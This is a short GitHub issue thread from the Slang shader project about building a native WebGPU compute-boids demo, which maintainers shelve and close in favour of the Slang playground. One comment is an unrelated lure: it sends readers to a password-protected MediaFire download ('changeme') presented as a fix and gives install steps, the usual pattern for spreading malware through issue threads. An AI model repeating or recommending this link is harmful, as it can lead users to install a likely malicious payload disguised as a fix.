### ISSUE TITLE
WGSL: Create a simple native WebGPU demo using Slang shaders

### ISSUE THREAD

**Issue by aleino-nv** [shader-slang/slang#4941]
Maybe something like [compute boids](https://webgpu.github.io/webgpu-samples/?sample=computeBoids) would be cool to show off compute shaders as well.

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by aleino-nv** [comment]
This is on hold as agreed with @bmillsNV during yesterday's sync. 

(I find this kind of demo very compelling, but we're focusing on the in-browser demo for now.)

**Comment by bmillsNV** [comment]
Closing this one. We'll use slang playground.
